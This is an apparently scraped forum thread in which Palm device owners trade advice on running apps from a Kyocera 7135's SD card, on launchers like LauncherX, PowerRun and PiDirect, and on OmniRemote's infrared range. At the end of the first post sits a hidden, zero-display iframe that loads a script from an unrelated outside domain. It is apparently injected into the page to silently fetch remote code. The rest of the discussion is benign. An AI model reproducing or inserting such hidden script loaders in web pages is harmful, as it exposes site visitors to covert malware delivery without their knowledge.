+ Reply to Thread

Which apps work well on the SD card?

During my fun filled all-nighter last night, I maxed out my new 7135's 16MB RAM (and that isn't even Mp3s)! So now I need to move some apps over to the card to free up some room.

Could you all please list some apps that do well over there on the card? Thanks.

Oh, also, do I need some 3rd Party app to have shortcuts on the main screen that will lead to the app on the card?

t'anks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ~'kito
    pdaPhoneHome Moderator

You need a 3rd Party launcher. I use LauncherX but there are others.

I have lots of stuff on the card

Handyshopper
    JFile
    Mapopolis
    Omniremote
    Acrobat Reader
    Bible Readers (4 of them)
    PalmReader
    Blazer
    Almost ALL of my games
    Almost ALL of my documents

Datebk5 and other programs I need right away remain in RAM.

I use PowerRun and occasionally PiDirect (the free version).

I bought SilverScreen a long time ago, but haven't installed it yet. Does that work well with the 7135?
    ~'kito
    pdaPhoneHome Moderator

poked back in
    I just know with LauncherX you can make shortcuts so that apps on the card are treated like RAM apps for conduits and the like. Just be sure to put your programs in /Palm/Launcher and your documents in /Programs/Wordsmith or whatever it is for the specific program.

Originally posted by Beryl
    You need a 3rd Party launcher. I use LauncherX but there are others.

I have lots of stuff on the card

Handyshopper
    JFile
    Mapopolis
    Omniremote
    Acrobat Reader
    Bible Readers (4 of them)
    PalmReader
    Blazer
    Almost ALL of my games
    Almost ALL of my documents

Datebk5 and other programs I need right away remain in RAM.

I use PowerRun and occasionally PiDirect (the free version).
    How is OmniRemote working for you on the 7135? What kind of range do you have on the IR? I had a problem with it when I first hotsync'ed, and haven't tried to re-install yet -since I have lost my serial number... and am wondering if it is worth contacting Pacific Neotek to see if they have a record of my serial numebr or not.

Alan

Yeah, I want to get OmniRemote too and set it up to control my ReplayTVs when I can't find the remotes.

I assume we'd get a whimpering 3-5 feet IR range if it is anything like the 6035. :'o(
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I bought SilverScreen a long time ago, but haven't installed it yet. Does that work well with the 7135?
    I like LauncherX much better than SilverScreen, particularly its ability to access the VFS.

You need a 3rd Party launcher. I use LauncherX but there are others... I use PowerRun and occasionally PiDirect (the free version).
    So if I get LauncherX, do I need PowerRun or PiDirect? and what do they do?

Sorry I sound so clueless, I'm just new to this whole SD for Palm thing.
    ~'kito
    pdaPhoneHome Moderator

Since I purchased my 7135 I have been thinking about selling my m505. BUT what if I buy an IR enhancer for the SD slot and use Omniremote as a dedicated remote control. I could hide the 5 remotes I'm using now. Macros sound pretty good too (TV-on, Amp-on, DVD player-on, volume up for a movie).

Back on topic. I use Launcher X too. Everything works fine. There's a little "shortcut" icon to let you know you're working from the card.

I simply put my apps on the SD card in /PALM/LAUNCHER in all caps and they work from the palm app view.

You just click on the "all" at the top right, & SD256MB is in the list. Choose it and your SD apps are there for you to play with...
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

The only thing I would use is the backup buddy. I think apps run a little slower when ran off the MMC.

Originally posted by alanb
    How is OmniRemote working for you on the 7135? What kind of range do you have on the IR?
    It works fine at about 3 feet. Pacific Neotek probably will give you a new serial number. If it has been a while for you, you might want to upgrade anyway.

Originally posted by Markito
    So if I get LauncherX, do I need PowerRun or PiDirect? and what do they do?
    You don't need either. They are good for programs that don't fully support VFS.

PowerRun enables you to store not only the program but associated files on the card. It is good for programs that have small associated files that you always need everytime you use the program. It is good for games but not for doc readers or database programs.

PiDirect allows you to assign a card directory to be read as if it was in RAM or PalmLauncher. It is good for large read-only files (dictionaries, maps, etc.) that only get loaded when needed -- not necessarily every time you load the program.

Thanks B. You're one cool chick in the know.

By the way, are you sure that you don't like to come to Minnesota in the winter? Because today it was literally 10 degrees below zero and the windchill was 29 degrees below zero (that's 61 degrees below freezing)!!!

C'mon, it's good for you!
    ~'kito
    pdaPhoneHome Moderator

And now its SNOWING... Wierd that we havent had this much snow in months.. my yard is all dirt cause my dogs ran all over it.
    iPhone therefore iAm.

Back on topic---- I have used someone elses palm with Dataviz's to-go stuff and they all support SD (uses seperate datavize program to convert & install to card)
    iPhone therefore iAm.

I am running MegaLauncher. I loaded the 2003 Zagat. There are lots of guides I'd like to load for various cities. How do I get Zagat to recognize the data on the SD card rather than RAM?

Do I need PiDirect for this?

Thanks!

--Richard

OmniRemote Range

It works fine at about 3 feet. Pacific Neotek probably will give you a new serial number. If it has been a while for you, you might want to upgrade anyway.
    Mine works to a little over 8'.

Pray! It may prevent data loss!

RE OmniRemote

OmniRemote works great on mine. About 10ft in normal light. Make sure you read the info on how to best program it. And the category buttons are great. I've currently got 3 tvs and 2 VCRs programmed onto mine and I can access them all from the hardkeys. Takes a long time to draw and program and link and ect., but it's one of my favorite programs.

It's for you Sweetheart! WiredToTheMax's Avatar

Does putting the path in caps still work?

Originally posted by larryganz
    I simply put my apps on the SD card in /PALM/LAUNCHER in all caps and they work from the palm app view.

You just click on the "all" at the top right, & SD256MB is in the list. Choose it and your SD apps are there for you to play with...
    I can't seem to see the apps loaded on the SD card from the "all" menu. I'm trying to assign MobileMail to the message button. Any ideas?

Mike
    Current gear:
    Blackberry 7230, Ipaq 4350, Samsung i600, Magellan Map330 GPS

Past gear:
    Samsung i700, Ipaq 3850, Kyocera 7135, Ipaq 3635, Palm Pro, Palm III, Psion 3a
    ----------------------------------
    blah, blah, blah... Hey Verizon guy, can you hear that?